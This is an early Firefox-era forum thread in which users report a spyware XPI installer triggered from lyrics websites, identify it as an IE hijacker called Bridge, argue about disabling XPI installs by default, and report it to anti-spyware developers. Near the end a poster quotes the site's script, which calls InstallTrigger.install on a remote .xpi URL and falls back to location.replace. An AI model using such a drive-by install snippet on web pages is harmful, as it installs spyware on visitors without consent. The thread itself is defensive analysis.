We got another XPISpyware

[esavior]

http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm

Its there alright. I could only get it to popup once. but after diging through the source its in a extrenal js file.
It grabs the XPI from:
http://www2.flingstone.com/cab/sbc_netscape.xpi
You can find the code in the 4th extrenal script call, the one with all the characters. I would just paste it here but I dont know the legality in pasting their code.

[arch]

I poked around xpi a bit. Here's the summary:

Xpi contains sbc_netscape.exe, it installs program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.

[chapas]

Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T

[AnonEmoose]

see my proposed answer here
http://forums.mozillazine.org/viewtopic ... 828#463828

[esavior]

Here is what bridge is
http://www.kephyr.com/spywarescanner/li ... ndex.phtml

[logan]

Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T

unless someone blindly changes the xpinstall.* defaults, it's not a problem.

[Thesh]

unless someone blindly changes the xpinstall.* defaults, it's not a problem.

I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.

[nexx]

iirc recent builds dont allow xpi installation unless the user specicially clicks on a link, so they wont popup when a page loads.
Extensions are a key part of firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.

[esavior]

I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... atleast enough to know that they need to turn that option on. What I am concerned about is the newb user that the first time that see that popup is on a spywared site and wont know what to do, they my just press install. Try to remember that most people wont know what or even use extensions once fx starts getting mass deployment, everyone here uses extensions but we arent average users.

[MonkeeSage]

I'd like to see a message box like AnonEmoose suggested, something along the lines of...

"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."

...with the 'critical' icon on the prompt.


Shelumi`El
Jordan

S.D.G

[wildman]

unless someone blindly changes the xpinstall.* defaults, it's not a problem.

I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.

Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develope, very few MS drivers are signed by MS so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view...

Extension Manager with AutoUpdate - MozillaZine Forums
http://forums.mozillazine.org/viewtopic.php?t=63373

[wildman]

I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman, Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi

Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...

We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531

...and possibly support/contribute anti-spyware sollutions to thier project in the form of a SpyBot plugin/extension.

I made a similar comment on a Moz related blog recently, that may interest you.

Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml

[esavior]

Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/

[Kraftwerk]

iirc recent builds dont allow xpi installation unless the user specicially clicks on a link, so they wont popup when a page loads.

I'm using the 20040403 build and it still tries to install.. :/
there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..

[esavior]

aye its a extrenal script,

trys
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}

and I am using the newest build and still its happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)